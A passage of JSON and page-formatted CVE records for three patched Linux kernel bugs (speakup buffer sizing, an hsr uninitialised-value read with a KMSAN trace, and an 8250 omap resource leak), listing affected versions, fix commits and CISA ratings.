"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.19.313",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "5.4.275",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "5.10.216",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "5.15.157",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "6.1.88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "6.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "6.8.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspeakup: Fix sizeof() vs ARRAY_SIZE() bug\n\nThe \"buf\" pointer is an array of u16 values. This code should be\nusing ARRAY_SIZE() (which is 256) instead of sizeof() (which is 512),\notherwise it can the still got out of bounds."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:42.988Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/42f0a3f67158ed6b2908d2b9ffbf7e96d23fd358"
},
{
"url": "https://git.kernel.org/stable/c/cd7f3978c2ec741aedd1d860b2adb227314cf996"
},
{
"url": "https://git.kernel.org/stable/c/07ef95cc7a579731198c93beed281e3a79a0e586"
},
{
"url": "https://git.kernel.org/stable/c/504178fb7d9f6cdb0496d5491efb05f45597e535"
},
{
"url": "https://git.kernel.org/stable/c/3726f75a1ccc16cd335c0ccfad1d92ee08ecba5e"
},
{
"url": "https://git.kernel.org/stable/c/c6e1650cf5df1bd6638eeee231a683ef30c7d4eb"
},
{
"url": "https://git.kernel.org/stable/c/eb1ea64328d4cc7d7a912c563f8523d5259716ef"
},
{
"url": "https://git.kernel.org/stable/c/d52c04474feac8e305814a5228e622afe481b2ef"
},
{
"url": "https://git.kernel.org/stable/c/008ab3c53bc4f0b2f20013c8f6c204a3203d0b8b"
}
],
"title": "speakup: Fix sizeof() vs ARRAY_SIZE() bug",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38587",
"datePublished": "2024-06-19T13:37:42.537Z",
"dateReserved": "2024-06-18T19:36:34.929Z",
"dateUpdated": "2025-11-04T17:21:38.044Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26863 (GCVE-0-2024-26863)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hsr: Fix uninit-value access in hsr_get_node()
KMSAN reported the following uninit-value access issue [1]:
=====================================================
BUG: KMSAN: uninit-value in hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246
hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246
fill_frame_info net/hsr/hsr_forward.c:577 [inline]
hsr_forward_skb+0xe12/0x30e0 net/hsr/hsr_forward.c:615
hsr_dev_xmit+0x1a1/0x270 net/hsr/hsr_device.c:223
__netdev_start_xmit include/linux/netdevice.h:4940 [inline]
netdev_start_xmit include/linux/netdevice.h:4954 [inline]
xmit_one net/core/dev.c:3548 [inline]
dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564
__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349
dev_queue_xmit include/linux/netdevice.h:3134 [inline]
packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3087 [inline]
packet_sendmsg+0x8b1d/0x9f30 net/packet/af_packet.c:3119
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
__sys_sendto+0x735/0xa10 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1c0 net/socket.c:2199
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768
slab_alloc_node mm/slub.c:3478 [inline]
kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523
kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560
__alloc_skb+0x318/0x740 net/core/skbuff.c:651
alloc_skb include/linux/skbuff.h:1286 [inline]
alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334
sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787
packet_alloc_skb net/packet/af_packet.c:2936 [inline]
packet_snd net/packet/af_packet.c:3030 [inline]
packet_sendmsg+0x70e8/0x9f30 net/packet/af_packet.c:3119
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
__sys_sendto+0x735/0xa10 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1c0 net/socket.c:2199
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
CPU: 1 PID: 5033 Comm: syz-executor334 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023
=====================================================
If the packet type ID field in the Ethernet header is either ETH_P_PRP or
ETH_P_HSR, but it is not followed by an HSR tag, hsr_get_skb_sequence_nr()
reads an invalid value as a sequence number. This causes the above issue.
This patch fixes the issue by returning NULL if the Ethernet header is not
followed by an HSR tag.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 Version: f266a683a4804dc499efc6c2206ef68efed029d0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26863",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-10T14:26:51.386344Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:38.902Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.149Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3b2bfb8ff1810a537b2aa55ba906a6743ed120c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/889ed056eae7fda85b769a9ab33c093379c45428"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7fb2d4d6bb1c85f7a23aace0ed6c86a95dea792a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a809bbfd0e503351d3051317288a70a4569a4949"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ed222ca7396938eb1ab2d034f1ba0d8b00a7122"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/39cc316fb3bc5e7c9dc5eed314fe510d119c6862"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97d2148ea435dff4b4e71817c9032eb321bcd37e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/09e5cdbe2cc88c3c758927644a3eb02fac317209"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ddbec99f58571301679addbc022256970ca3eac6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_framereg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e3b2bfb8ff1810a537b2aa55ba906a6743ed120c",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "889ed056eae7fda85b769a9ab33c093379c45428",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "7fb2d4d6bb1c85f7a23aace0ed6c86a95dea792a",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "a809bbfd0e503351d3051317288a70a4569a4949",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "1ed222ca7396938eb1ab2d034f1ba0d8b00a7122",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "39cc316fb3bc5e7c9dc5eed314fe510d119c6862",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "97d2148ea435dff4b4e71817c9032eb321bcd37e",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "09e5cdbe2cc88c3c758927644a3eb02fac317209",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "ddbec99f58571301679addbc022256970ca3eac6",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_framereg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.17"
},
{
"lessThan": "3.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhsr: Fix uninit-value access in hsr_get_node()\n\nKMSAN reported the following uninit-value access issue [1]:\n\n=====================================================\nBUG: KMSAN: uninit-value in hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246\n hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246\n fill_frame_info net/hsr/hsr_forward.c:577 [inline]\n hsr_forward_skb+0xe12/0x30e0 net/hsr/hsr_forward.c:615\n hsr_dev_xmit+0x1a1/0x270 net/hsr/hsr_device.c:223\n __netdev_start_xmit include/linux/netdevice.h:4940 [inline]\n netdev_start_xmit include/linux/netdevice.h:4954 [inline]\n xmit_one net/core/dev.c:3548 [inline]\n dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\n dev_queue_xmit include/linux/netdevice.h:3134 [inline]\n packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276\n packet_snd net/packet/af_packet.c:3087 [inline]\n packet_sendmsg+0x8b1d/0x9f30 net/packet/af_packet.c:3119\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\n slab_alloc_node mm/slub.c:3478 [inline]\n kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560\n __alloc_skb+0x318/0x740 net/core/skbuff.c:651\n alloc_skb include/linux/skbuff.h:1286 [inline]\n alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334\n sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787\n packet_alloc_skb net/packet/af_packet.c:2936 [inline]\n packet_snd net/packet/af_packet.c:3030 [inline]\n packet_sendmsg+0x70e8/0x9f30 net/packet/af_packet.c:3119\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nCPU: 1 PID: 5033 Comm: syz-executor334 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023\n=====================================================\n\nIf the packet type ID field in the Ethernet header is either ETH_P_PRP or\nETH_P_HSR, but it is not followed by an HSR tag, hsr_get_skb_sequence_nr()\nreads an invalid value as a sequence number. This causes the above issue.\n\nThis patch fixes the issue by returning NULL if the Ethernet header is not\nfollowed by an HSR tag."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:14.505Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e3b2bfb8ff1810a537b2aa55ba906a6743ed120c"
},
{
"url": "https://git.kernel.org/stable/c/889ed056eae7fda85b769a9ab33c093379c45428"
},
{
"url": "https://git.kernel.org/stable/c/7fb2d4d6bb1c85f7a23aace0ed6c86a95dea792a"
},
{
"url": "https://git.kernel.org/stable/c/a809bbfd0e503351d3051317288a70a4569a4949"
},
{
"url": "https://git.kernel.org/stable/c/1ed222ca7396938eb1ab2d034f1ba0d8b00a7122"
},
{
"url": "https://git.kernel.org/stable/c/39cc316fb3bc5e7c9dc5eed314fe510d119c6862"
},
{
"url": "https://git.kernel.org/stable/c/97d2148ea435dff4b4e71817c9032eb321bcd37e"
},
{
"url": "https://git.kernel.org/stable/c/09e5cdbe2cc88c3c758927644a3eb02fac317209"
},
{
"url": "https://git.kernel.org/stable/c/ddbec99f58571301679addbc022256970ca3eac6"
}
],
"title": "hsr: Fix uninit-value access in hsr_get_node()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26863",
"datePublished": "2024-04-17T10:27:26.252Z",
"dateReserved": "2024-02-19T14:20:24.184Z",
"dateUpdated": "2025-05-04T08:58:14.505Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52457 (GCVE-0-2023-52457)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: 8250: omap: Don't skip resource freeing if pm_runtime_resume_and_get() failed
Returning an error code from .remove() makes the driver core emit the
little helpful error message:
remove callback returned a non-zero value. This will be ignored.
and then remove the device anyhow. So all resources that were not freed
are leaked in this case. Skipping serial8250_unregister_port() has the
potential to keep enough of the UART around to trigger a use-after-free.
So replace the error return (and with it the little helpful error
message) by a more useful error message and continue to cleanup.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2d66412563ef8953e2bac2d98d2d832b3f3f49cd Version: d833cba201adf9237168e19f0d76e4d7aa69f303 Version: e0db709a58bdeb8966890882261a3f8438c5c9b7 Version: e3f0c638f428fd66b5871154b62706772045f91a Version: e3f0c638f428fd66b5871154b62706772045f91a Version: e3f0c638f428fd66b5871154b62706772045f91a Version: e3f0c638f428fd66b5871154b62706772045f91a Version: 02eed6390dbe61115f3e3f63829c95c611aee67b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.619Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b502fb43f7fb55aaf07f6092ab44657595214b93"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc57f3ef8a9eb0180606696f586a6dcfaa175ed0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/828cd829483f0cda920710997aed79130b0af690"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d74173bda29aba58f822175d983d07c8ed335494"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/887a558d0298d36297daea039954c39940228d9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95e4e0031effad9837af557ecbfd4294a4d8aeee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad90d0358bd3b4554f243a425168fc7cebe7d04e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52457",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:02:36.778988Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:47.687Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/8250/8250_omap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b502fb43f7fb55aaf07f6092ab44657595214b93",
"status": "affected",
"version": "2d66412563ef8953e2bac2d98d2d832b3f3f49cd",
"versionType": "git"
},
{
"lessThan": "bc57f3ef8a9eb0180606696f586a6dcfaa175ed0",
"status": "affected",
"version": "d833cba201adf9237168e19f0d76e4d7aa69f303",
"versionType": "git"
},
{
"lessThan": "828cd829483f0cda920710997aed79130b0af690",
"status": "affected",
"version": "e0db709a58bdeb8966890882261a3f8438c5c9b7",
"versionType": "git"
},
{
"lessThan": "d74173bda29aba58f822175d983d07c8ed335494",
"status": "affected",
"version": "e3f0c638f428fd66b5871154b62706772045f91a",
"versionType": "git"
},
{
"lessThan": "887a558d0298d36297daea039954c39940228d9b",
"status": "affected",
"version": "e3f0c638f428fd66b5871154b62706772045f91a",
"versionType": "git"
},
{
"lessThan": "95e4e0031effad9837af557ecbfd4294a4d8aeee",
"status": "affected",
"version": "e3f0c638f428fd66b5871154b62706772045f91a",
"versionType": "git"
},
{
"lessThan": "ad90d0358bd3b4554f243a425168fc7cebe7d04e",
"status": "affected",
"version": "e3f0c638f428fd66b5871154b62706772045f91a",
"versionType": "git"
},
{
"status": "affected",
"version": "02eed6390dbe61115f3e3f63829c95c611aee67b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/8250/8250_omap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "5.4.225",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.10.156",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.15.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: 8250: omap: Don\u0027t skip resource freeing if pm_runtime_resume_and_get() failed\n\nReturning an error code from .remove() makes the driver core emit the\nlittle helpful error message:\n\n\tremove callback returned a non-zero value. This will be ignored.\n\nand then remove the device anyhow. So all resources that were not freed\nare leaked in this case. Skipping serial8250_unregister_port() has the\npotential to keep enough of the UART around to trigger a use-after-free.\n\nSo replace the error return (and with it the little helpful error\nmessage) by a more useful error message and continue to cleanup."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:03.340Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b502fb43f7fb55aaf07f6092ab44657595214b93"
},
{
"url": "https://git.kernel.org/stable/c/bc57f3ef8a9eb0180606696f586a6dcfaa175ed0"
},
{
"url": "https://git.kernel.org/stable/c/828cd829483f0cda920710997aed79130b0af690"
},
{
"url": "https://git.kernel.org/stable/c/d74173bda29aba58f822175d983d07c8ed335494"
},
{
"url": "https://git.kernel.org/stable/c/887a558d0298d36297daea039954c39940228d9b"
},
{
"url": "https://git.kernel.org/stable/c/95e4e0031effad9837af557ecbfd4294a4d8aeee"
},
{
"url": "https://git.kernel.org/stable/c/ad90d0358bd3b4554f243a425168fc7cebe7d04e"
}
],
"title": "serial: 8250: omap: Don\u0027t skip resource freeing if pm_runtime_resume_and_get() failed",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
